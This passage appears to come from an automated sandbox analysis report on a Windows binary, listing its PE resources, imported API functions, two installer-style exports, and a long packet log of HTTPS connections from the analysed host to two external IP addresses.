RT_ICON	0x6c6bc	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512, 16 important colors	English	United States	0.3629032258064516
RT_ICON	0x6c9a4	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States	0.4250902527075812
RT_ICON	0x6d24c	0xca8	Device independent bitmap graphic, 32 x 64 x 24, image size 3072	English	United States	0.2756172839506173
RT_GROUP_ICON	0x6def4	0x5a	data	English	United States	0.7
RT_GROUP_ICON	0x6df50	0x5a	data	English	United States	0.7
RT_GROUP_ICON	0x6dfac	0x5a	data	English	United States	0.7111111111111111
RT_GROUP_ICON	0x6e008	0x5a	data	English	United States	0.7111111111111111
RT_GROUP_ICON	0x6e064	0x5a	data	English	United States	0.7111111111111111
RT_GROUP_ICON	0x6e0c0	0x5a	data	English	United States	0.7
RT_GROUP_ICON	0x6e11c	0x5a	data	English	United States	0.7111111111111111
RT_GROUP_ICON	0x6e178	0x5a	data	English	United States	0.7111111111111111
RT_GROUP_ICON	0x6e1d4	0x5a	data	English	United States	0.7222222222222222
RT_GROUP_ICON	0x6e230	0x5a	data	English	United States	0.7222222222222222
RT_GROUP_ICON	0x6e28c	0x5a	data	English	United States	0.7333333333333333
RT_GROUP_ICON	0x6e2e8	0x5a	data	English	United States	0.7333333333333333
RT_GROUP_ICON	0x6e344	0x5a	data	English	United States	0.7333333333333333
RT_GROUP_ICON	0x6e3a0	0x5a	data	English	United States	0.7333333333333333
RT_GROUP_ICON	0x6e3fc	0x5a	data	English	United States	0.7666666666666667
RT_VERSION	0x6e458	0x2e0	data	English	United States	0.46603260869565216
RT_MANIFEST	0x6e738	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
VERSION.dll	GetFileVersionInfoA, GetFileVersionInfoSizeA, VerQueryValueA
MSIMG32.dll	TransparentBlt
KERNEL32.dll	GetProcAddress, ReleaseMutex, WaitForSingleObject, GetCurrentProcessId, FreeResource, SizeofResource, LockResource, LoadResource, FindResourceA, GetModuleHandleA, LoadLibraryExA, GetSystemDirectoryA, LoadLibraryA, GetFileAttributesA, GetUserDefaultLCID, GetLocaleInfoA, FlushFileBuffers, SetStdHandle, HeapSize, GetSystemInfo, VirtualProtect, SetFilePointer, GetStringTypeW, GetStringTypeA, LCMapStringW, LCMapStringA, IsBadCodePtr, IsBadReadPtr, InitializeCriticalSection, DeleteFileA, InterlockedExchange, GetFileType, FreeLibrary, GetEnvironmentStringsW, WideCharToMultiByte, FreeEnvironmentStringsW, GetEnvironmentStrings, FreeEnvironmentStringsA, UnhandledExceptionFilter, GetStdHandle, WriteFile, GetCurrentProcess, TerminateProcess, IsBadWritePtr, HeapReAlloc, VirtualAlloc, VirtualFree, HeapCreate, HeapDestroy, GetCPInfo, GetOEMCP, GetACP, TlsGetValue, TlsSetValue, TlsFree, SetLastError, TlsAlloc, SetUnhandledExceptionFilter, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, GetSystemTimeAsFileTime, GetCurrentThreadId, GetTickCount, QueryPerformanceCounter, HeapAlloc, GetStartupInfoA, lstrlenA, HeapFree, RtlUnwind, RaiseException, ExitProcess, GetShortPathNameA, CloseHandle, CreateMutexA, GetLastError, GetCommandLineA, Sleep, GlobalAlloc, GlobalFree, SetHandleCount, GetModuleFileNameA, lstrcatA, lstrcpyA, GetVersionExA, MultiByteToWideChar, VirtualQuery
USER32.dll	GetDlgItem, MessageBoxA, DialogBoxParamA, LoadBitmapA, LoadCursorA, LoadStringA, RegisterWindowMessageA, MoveWindow, IsWindow, GetClientRect, GetWindowLongA, SetWindowPos, SetCursor, ValidateRect, wsprintfA, GetSystemMetrics, BeginPaint, EndPaint, RemovePropA, GetCursorPos, GetWindowRect, SendMessageA, GetClassLongA, SetClassLongA, DefWindowProcA, FindWindowA, IsIconic, ShowWindow, SetForegroundWindow, DrawMenuBar, SetPropA, SetMenu, GetDesktopWindow, GetDC, GetMenuState, GetMenuItemID, ReleaseDC, CallWindowProcA, SetWindowLongA, GetMenu, GetPropA, GetMenuStringA, SetMenuItemInfoA, GetSysColorBrush, EnableMenuItem, GetMenuItemCount, CreateMenu, GetSubMenu, CreatePopupMenu, GetMenuItemInfoA, InsertMenuA, IsWindowVisible, DrawTextExA, SetRect, EndDialog, GetSysColor, FillRect, SetWindowTextA
GDI32.dll	GetTextMetricsA, SetBkMode, SetTextColor, GetObjectA, CreateCompatibleDC, DeleteDC, GetStockObject, BitBlt, CreateSolidBrush, DeleteObject, SelectObject
ADVAPI32.dll	RegEnumKeyA, RegQueryInfoKeyA, RegEnumValueA, RegDeleteValueA, RegCloseKey, RegDeleteKeyA, RegCreateKeyExA, RegSetValueExA, RegOpenKeyExA, RegQueryValueExA
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHGetMalloc, SHAppBarMessage, SHChangeNotify
ole32.dll	CoUninitialize, CoCreateInstance, CoInitialize

Exports

Name	Ordinal	Address
QTPostInstallProc	1	0x404fb0
QTPreUninstallProc	2	0x405010

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 26, 2023 09:46:52.611459017 CEST	49764	443	192.168.2.8	185.138.252.1
Sep 26, 2023 09:46:52.611494064 CEST	443	49764	185.138.252.1	192.168.2.8
Sep 26, 2023 09:46:52.611583948 CEST	49764	443	192.168.2.8	185.138.252.1
Sep 26, 2023 09:46:52.614331007 CEST	49764	443	192.168.2.8	185.138.252.1
Sep 26, 2023 09:46:52.614343882 CEST	443	49764	185.138.252.1	192.168.2.8
Sep 26, 2023 09:46:53.238866091 CEST	443	49764	185.138.252.1	192.168.2.8
Sep 26, 2023 09:46:53.239125013 CEST	49764	443	192.168.2.8	185.138.252.1
Sep 26, 2023 09:46:53.242032051 CEST	49764	443	192.168.2.8	185.138.252.1
Sep 26, 2023 09:46:53.242058992 CEST	443	49764	185.138.252.1	192.168.2.8
Sep 26, 2023 09:46:53.242455006 CEST	443	49764	185.138.252.1	192.168.2.8
Sep 26, 2023 09:46:53.289191961 CEST	49764	443	192.168.2.8	185.138.252.1
Sep 26, 2023 09:46:53.341655016 CEST	49764	443	192.168.2.8	185.138.252.1
Sep 26, 2023 09:46:53.388509035 CEST	443	49764	185.138.252.1	192.168.2.8
Sep 26, 2023 09:46:53.832539082 CEST	443	49764	185.138.252.1	192.168.2.8
Sep 26, 2023 09:46:53.832737923 CEST	443	49764	185.138.252.1	192.168.2.8
Sep 26, 2023 09:46:53.832815886 CEST	49764	443	192.168.2.8	185.138.252.1
Sep 26, 2023 09:46:53.833292961 CEST	49764	443	192.168.2.8	185.138.252.1
Sep 26, 2023 09:46:53.833337069 CEST	443	49764	185.138.252.1	192.168.2.8
Sep 26, 2023 09:46:53.833374023 CEST	49764	443	192.168.2.8	185.138.252.1
Sep 26, 2023 09:46:53.833389044 CEST	443	49764	185.138.252.1	192.168.2.8
Sep 26, 2023 09:46:54.105407953 CEST	49765	443	192.168.2.8	185.138.252.1
Sep 26, 2023 09:46:54.105446100 CEST	443	49765	185.138.252.1	192.168.2.8
Sep 26, 2023 09:46:54.105539083 CEST	49765	443	192.168.2.8	185.138.252.1
Sep 26, 2023 09:46:54.106229067 CEST	49765	443	192.168.2.8	185.138.252.1
Sep 26, 2023 09:46:54.106252909 CEST	443	49765	185.138.252.1	192.168.2.8
Sep 26, 2023 09:46:54.681143999 CEST	443	49765	185.138.252.1	192.168.2.8
Sep 26, 2023 09:46:54.681263924 CEST	49765	443	192.168.2.8	185.138.252.1
Sep 26, 2023 09:46:54.682687998 CEST	49765	443	192.168.2.8	185.138.252.1
Sep 26, 2023 09:46:54.682699919 CEST	443	49765	185.138.252.1	192.168.2.8
Sep 26, 2023 09:46:54.683036089 CEST	443	49765	185.138.252.1	192.168.2.8
Sep 26, 2023 09:46:54.686431885 CEST	49765	443	192.168.2.8	185.138.252.1
Sep 26, 2023 09:46:54.728534937 CEST	443	49765	185.138.252.1	192.168.2.8
Sep 26, 2023 09:46:55.249790907 CEST	443	49765	185.138.252.1	192.168.2.8
Sep 26, 2023 09:46:55.250004053 CEST	443	49765	185.138.252.1	192.168.2.8
Sep 26, 2023 09:46:55.250107050 CEST	49765	443	192.168.2.8	185.138.252.1
Sep 26, 2023 09:46:55.251116037 CEST	49765	443	192.168.2.8	185.138.252.1
Sep 26, 2023 09:46:55.251132965 CEST	443	49765	185.138.252.1	192.168.2.8
Sep 26, 2023 09:46:55.434472084 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:55.434587002 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:55.434698105 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:55.435503960 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:55.435540915 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:55.712563038 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:55.712661982 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:55.714709997 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:55.714728117 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:55.715068102 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:55.716331005 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:55.760523081 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.512089014 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.512185097 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.512243032 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.512257099 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.512293100 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.512332916 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.512342930 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.512384892 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.512444019 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.512454987 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.512687922 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.512742043 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.512753010 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.512938976 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.512993097 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.513001919 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.513137102 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.513174057 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.513175964 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.513190031 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.513237953 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.513561964 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.513678074 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.513726950 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.513731003 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.513740063 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.513778925 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.513828039 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.514723063 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.514772892 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.514777899 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.514791012 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.514841080 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.515115023 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.515331030 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.515368938 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.515378952 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.554790974 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.637083054 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.637357950 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.637422085 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.637439013 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.637485981 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.637541056 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.637628078 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.637818098 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.637862921 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.637885094 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.638492107 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.638566017 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.638576031 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.638758898 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.638808012 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.638818026 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.638948917 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.638995886 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.639005899 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.639138937 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.639187098 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.639195919 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.639313936 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.639352083 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.639364958 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.639683008 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.639750957 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.639760017 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.639792919 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.640352011 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.640420914 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.640449047 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.640510082 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.641189098 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.641251087 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.641521931 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.641578913 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.642235994 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.642297983 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.642971039 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.643029928 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.643229961 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.643292904 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.643978119 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.644040108 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.682418108 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.682547092 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.763394117 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.763451099 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.763503075 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.763521910 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.763554096 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.763575077 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.764156103 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.764209986 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.764642954 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.764694929 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.764746904 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.764796019 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.765590906 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.765644073 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.766458035 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.766509056 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.766836882 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.766887903 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.766976118 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.767043114 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.767797947 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.767859936 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.768621922 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.768677950 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.768744946 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.768795967 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.769552946 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.769602060 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.770483971 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.770534039 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.770553112 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.770601988 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.771313906 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.771349907 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.771363974 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.771373034 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.771389961 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.772305965 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.772356033 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.772365093 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.772399902 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.773052931 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.773111105 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.773186922 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.773237944 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.774084091 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.774137974 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.774856091 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.774900913 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.774905920 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.774920940 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.774943113 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.775798082 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.775845051 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.775854111 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.775892973 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.776578903 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.776629925 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.776726007 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.776786089 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.777568102 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.777695894 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.778393984 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.778439045 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.778449059 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.778458118 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.778491974 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.779267073 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.779316902 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.808372974 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.808384895 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.808418036 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.808454037 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.808465958 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.808489084 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.851639986 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.889514923 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.889537096 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.889580965 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.889652014 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.889683962 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.891412020 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.891431093 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.891556025 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.891571045 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.891604900 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.893731117 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.893752098 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.893809080 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.893819094 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.893853903 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.896420956 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.896440029 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.896502018 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.896507978 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.896528006 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.896549940 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.897758961 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.897779942 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.897830963 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.897840977 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.897878885 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.900116920 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.900141954 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.900192022 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.900202036 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.900219917 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.900234938 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.902530909 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.902554035 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.902595043 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.902601004 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.902631998 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.904592991 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.904616117 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.904659986 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.904668093 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.904702902 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.907175064 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.907192945 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.907258034 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.907264948 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.907296896 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.909044027 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.909065962 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.909118891 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.909128904 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.909162998 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.911653042 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.911674023 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.911726952 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.911734104 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.911756039 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.911771059 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.913633108 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.913652897 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.913706064 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.913716078 CEST	443	49766	172.67.157.22	192.168.2.8
Sep 26, 2023 09:46:56.913727045 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.913744926 CEST	49766	443	192.168.2.8	172.67.157.22
Sep 26, 2023 09:46:56.916316032 CEST	443	49766	172.67.157.22	192.168.2.8
